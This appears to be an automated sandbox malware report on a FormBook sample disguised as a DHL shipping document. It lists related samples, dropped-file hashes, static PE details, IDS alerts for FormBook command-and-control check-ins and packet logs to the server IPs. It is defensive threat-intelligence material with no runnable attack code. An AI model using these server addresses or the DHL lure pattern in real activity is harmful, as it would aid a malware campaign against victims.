	vcimanagement.armv4l.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.250.157.117
REGISTER-ASIT	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	SRT68.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	CCE 30411252024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	ZAMOWIEN.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	195.110.124.133
	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
DONGFONG-TWDongFongTechnologyCoLtdTW	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	101.0.232.112
	mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	119.15.228.125
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	CCE 30411252024.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	116.50.37.244
SEDO-ASDE	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	236236236.elf	Get hash	malicious	Unknown	Browse	91.195.240.94
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	CCE 30411252024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	Certificate 11-19AIS.exe	Get hash	malicious	FormBook	Browse	91.195.240.94

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\trickstress

Download File

Process:	C:\Users\user\Desktop\DHL 8350232025-1.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.993427705900748
Encrypted:	true
SSDEEP:	6144:k7BuUlnDO80gGIK+Sz4ft48qK+iHBdQ3X+dSNCNVyhHY/G442:QZzHz34GqxiKuNuY/G442
MD5:	7F8B6533613259D12CAFCB1A97C3DA21
SHA1:	E733555E65437B4DD8731722B911CF4FF1AB101D
SHA-256:	8A612C2B7B47FC6B65F34AC988D9C2FC0C174332B51DEA52212E258BAD71EB90
SHA-512:	0837A47A806DB0F96AAAA02106BDFFC2594A64AA203AC044A5F6849D61EE417422CCC275529302BC46AA8732AE8C43B9EE64E4D641CE30998309EE45F69980FD
Malicious:	false
Reputation:	low
Preview:	..p..897B..\.....94..{VQ...4897BPNSUYI5U4897BPNSUYI5U4897.PNS[F.;U.1...Q..t.!\&.HKX%"/>u:([;[L.U'p<&;y [upwj./?6{TD?q4897BPNTP..5S..W%.s32.S....YP.J...e)R.....~0)..0*]hT_.7BPNSUYIe.48u6CP.;..I5U4897B.NQTRH>U4(=7BPNSUYI5.!897RPNSu]I5Ut89'BPNQUYO5U4897BVNSUYI5U4.=7BRNSUYI5W4x.7B@NSEYI5U$89'BPNSUYY5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5{@]ACBPN.Z]I5E489'FPNCUYI5U4897BPNSUyI554897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNSUYI5U4897BPNS

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.390367500639843
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DHL 8350232025-1.exe
File size:	1'563'648 bytes
MD5:	ac2d6baf219be307bce9bc93f3bd4f3a
SHA1:	058503c707b7025b3e18a093efdccb9fdf2c4c4f
SHA256:	092994c6de1265b32d1aa1bfb6192e4d15f5877a5f6f48833152dc2b4b3dd5c5
SHA512:	3a3f986167470d0e3221dad0190f0997feee5b2fa93b8580985ee7bfc11ca531d472cd802af702f872fd27045f6e9eca3e21140536199221850171b73e7104b1
SSDEEP:	24576:oqDEvCTbMWu7rQYlBQcBiT6rprG8aowuYv2brxiWzaezoCZZeHPRPWGEhsSDu:oTvC/MTQYxsWR7aowQdikpzoCCPWGERD
TLSH:	D475E10273D1D062FFAB92334B96F6515BBC69260123E62F13981DB9BD701B1463E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x677B5590 [Mon Jan 6 04:01:20 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F9549975853h
jmp 00007F954997515Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F954997533Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F954997530Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F9549977EFDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F9549977F48h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F9549977F31h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0xa7020	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x17c000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0xa7020	0xa7200	eb162507ecdcd9c20904ce928d0a71ab	False	0.9605050953627524	data	7.958843648247283	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x17c000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x9e2e6	data			1.0003179453936504
RT_GROUP_ICON	0x17aaa0	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x17ab18	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x17ab2c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x17ab40	0x14	data	English	Great Britain	1.25
RT_VERSION	0x17ab54	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x17ac30	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-06T14:32:46.582561+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49707	154.215.72.110	80	TCP
2025-01-06T14:33:18.609515+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49712	116.50.37.244	80	TCP
2025-01-06T14:34:40.132159+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49769	85.159.66.93	80	TCP
2025-01-06T14:34:53.680378+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49987	91.195.240.94	80	TCP
2025-01-06T14:35:15.158106+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49991	66.29.149.46	80	TCP
2025-01-06T14:35:28.573323+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49995	195.110.124.133	80	TCP
2025-01-06T14:35:58.216808+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.8	49999	217.196.55.202	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2025 14:32:45.689764977 CET	49707	80	192.168.2.8	154.215.72.110
Jan 6, 2025 14:32:45.694606066 CET	80	49707	154.215.72.110	192.168.2.8
Jan 6, 2025 14:32:45.694730997 CET	49707	80	192.168.2.8	154.215.72.110
Jan 6, 2025 14:32:45.702728987 CET	49707	80	192.168.2.8	154.215.72.110
Jan 6, 2025 14:32:45.707506895 CET	80	49707	154.215.72.110	192.168.2.8
Jan 6, 2025 14:32:46.582382917 CET	80	49707	154.215.72.110	192.168.2.8
Jan 6, 2025 14:32:46.582490921 CET	80	49707	154.215.72.110	192.168.2.8
Jan 6, 2025 14:32:46.582561016 CET	49707	80	192.168.2.8	154.215.72.110
Jan 6, 2025 14:32:46.585663080 CET	49707	80	192.168.2.8	154.215.72.110
Jan 6, 2025 14:32:46.590395927 CET	80	49707	154.215.72.110	192.168.2.8
Jan 6, 2025 14:33:10.131216049 CET	49708	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:10.135996103 CET	80	49708	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:10.136121988 CET	49708	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:10.138130903 CET	49708	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:10.142988920 CET	80	49708	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:11.005991936 CET	80	49708	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:11.006057978 CET	80	49708	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:11.006144047 CET	49708	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:11.643595934 CET	49708	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:12.671793938 CET	49710	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:12.676708937 CET	80	49710	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:12.676841021 CET	49710	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:12.678772926 CET	49710	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:12.683569908 CET	80	49710	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:13.569138050 CET	80	49710	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:13.569241047 CET	80	49710	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:13.569333076 CET	49710	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:14.184396029 CET	49710	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:15.202790976 CET	49711	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:15.207705021 CET	80	49711	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:15.207819939 CET	49711	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:15.209613085 CET	49711	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:15.214586973 CET	80	49711	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:15.214745998 CET	80	49711	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:16.071692944 CET	80	49711	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:16.071746111 CET	80	49711	116.50.37.244	192.168.2.8
Jan 6, 2025 14:33:16.071805954 CET	49711	80	192.168.2.8	116.50.37.244
Jan 6, 2025 14:33:16.715569973 CET	49711	80	192.168.2.8	116.50.37.244
